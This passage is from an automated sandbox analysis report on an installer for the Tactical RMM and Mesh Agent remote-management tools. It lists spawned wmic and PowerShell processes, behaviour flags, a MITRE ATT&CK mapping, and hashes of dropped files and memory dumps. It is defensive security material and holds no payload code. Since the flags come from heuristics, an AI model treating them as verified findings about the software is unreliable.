  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1056
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:2656

C:\Program Files\Mesh Agent\MeshAgent.exe
"C:\Program Files\Mesh Agent\MeshAgent.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1200
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Modifies data under HKEY_USERS
  PID:2476
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:2856
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:2812
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Modifies data under HKEY_USERS
  PID:2592
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:560
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in Program Files directory
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in Program Files directory
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in Program Files directory
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Drops file in Program Files directory
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
35KB

MD5
bbef72594a7ba380219fbf3473434a99

SHA1
04d7eb3e5c126e8db2fed8578416192db593994f

SHA256
858d65aa022484585e1b2bfe038752c14eacdb87eaf2d6e2efde92f92dde0ee5

SHA512
318093e33804763b0932c8e1c82922700a7a75c06bd9e320f8c750593c72501b7fadade4cd339d6c7a27b1cff88d550bf45b0739012f6607c12ba90010bda5ba

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.db

Filesize
153KB

MD5
d87405a43b3b0ab6a405f988660142fc

SHA1
36854ef74aae19f6f23f0f047cd86dd4e412ff6c

SHA256
c31349eb2d8e7b1fcf32fe6fc30fe16286701736b95a2fd91286ae6d2ce04e5c

SHA512
fc697d7c3608ae9e7998b5343050b6fbde8ddf1bf466a11173d7d753b0c05aca3370a6983ac580c07e46f6311f53368b56cc06ad2330b80e26d43f70d77f4537

Download Submit
C:\Program Files\Mesh Agent\MeshAgent.msh

Filesize
31KB

MD5
3def9ce05b48a96a5afbdea36aea0a4b

SHA1
75a0e960b1af485137301ee6021a54efa27bcf25

SHA256
6e9dd1a8e0181e570075f804d62da79e55da9d3d6ef6242a0ad6fab5b4178ce5

SHA512
657ca5d77dbf9536fa06a13ea2341eeb5d0da0645c0e4b00005b51f1d8994d3188f44fc38563bdb4d219f08e22d57330391f9c5ee261aa7b51d2c31fab728773

Download Submit
C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe

Filesize
4.3MB

MD5
2f046950e65922336cd83bf0dbc9de33

SHA1
ddc64a8b21c8146c93c0b19c1eeb0ef784b980c6

SHA256
412e1f600251b21911c582e69381f677e663231f5e1d10786d88a026e00ea811

SHA512
a11cbf8b8b692d2d5a0e3af5a97f91a3d1f3e7aa39966eb7d62b3244b3913f2fdc21823d5c94de0d98e579f801709df44433af91567356361d5d9699a93b2cbc

Download Submit
\Program Files\TacticalAgent\meshagent.exe

Filesize
3.3MB

MD5
2641d5b122336e87d2964c562898caea

SHA1
ad3b817c810702c6ccd060192566350ac5eb77fd

SHA256
88b6c219763de23bbe1752aa22d408bf9b3db1926e691fd6a299beb0680c9757

SHA512
4380d048e42ad1e58a64ea0bcb1f31c4cc343e43c12e052327a997505a804f68f2b26bad77dc48d4ce04b8d5d4adc6be6878c8ce462916247bc74ef136e2c401

Download Submit
\Program Files\TacticalAgent\tacticalrmm.exe

Filesize
9.2MB

MD5
bb383b7c3d5e4acb1001ab099b5b0f3c

SHA1
cb0c85f84a454aa4b1aab02bfba47c4355c2311e

SHA256
a6d3159c858aa3704f35d69b27829618ad0d1bae894c848a5233100c17464f95

SHA512
157dda96d1cacea55a6be27b9d432225b47d7334e664e577cef82a14c7eb1be1b8b84423b3905a4c1caecb5394be264d9b5c3e32109a4893e51a9d406ce740be

Download Submit
\Users\Admin\AppData\Local\Temp\is-ML12F.tmp\tacticalagent-v2.8.0-windows-amd64.tmp

Filesize
3.0MB

MD5
a639312111d278fee4f70299c134d620

SHA1
6144ca6e18a5444cdb9b633a6efee67aff931115

SHA256
4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

SHA512
f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

Download Submit
memory/1860-98-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/1860-97-0x000000001B270000-0x000000001B552000-memory.dmp

Filesize
2.9MB

Download
memory/2284-32-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2284-47-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2284-31-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2704-4-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/2704-28-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/2704-7-0x0000000000401000-0x00000000004B7000-memory.dmp

Filesize
728KB

Download
memory/2984-24-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/3000-103-0x0000000001CC0000-0x0000000001CC8000-memory.dmp

Filesize
32KB

Download
memory/3000-102-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

Filesize
2.9MB

Download
memory/3020-14-0x0000000000400000-0x0000000000712000-memory.dmp

Filesize
3.1MB

Download
memory/3020-27-0x0000000000400000-0x0000000000712000-memory.dmp

Filesize
3.1MB

Download